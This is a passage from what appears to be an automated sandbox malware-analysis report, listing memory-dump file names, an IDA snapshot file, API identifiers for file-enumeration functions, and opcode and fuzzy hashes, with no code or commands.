                                    • Associated: 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208371198.00000000005D7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208604830.00000000005D8000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2208811970.0000000000775000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: b29d2c6ada564be75a47af05dd2bf864d00da5f11092e71903f0ce78886b9624
                                    • Instruction ID: 8001bfb6a820d12d470231041464004f3531f0b7814c0d13e5f302d7a3d75ee4
                                    • Opcode Fuzzy Hash: b29d2c6ada564be75a47af05dd2bf864d00da5f11092e71903f0ce78886b9624
                                    • Instruction Fuzzy Hash: 6521D07A900218ABC755F7B0DC46EED333DA758301F008554B75956187DE7496C98BA3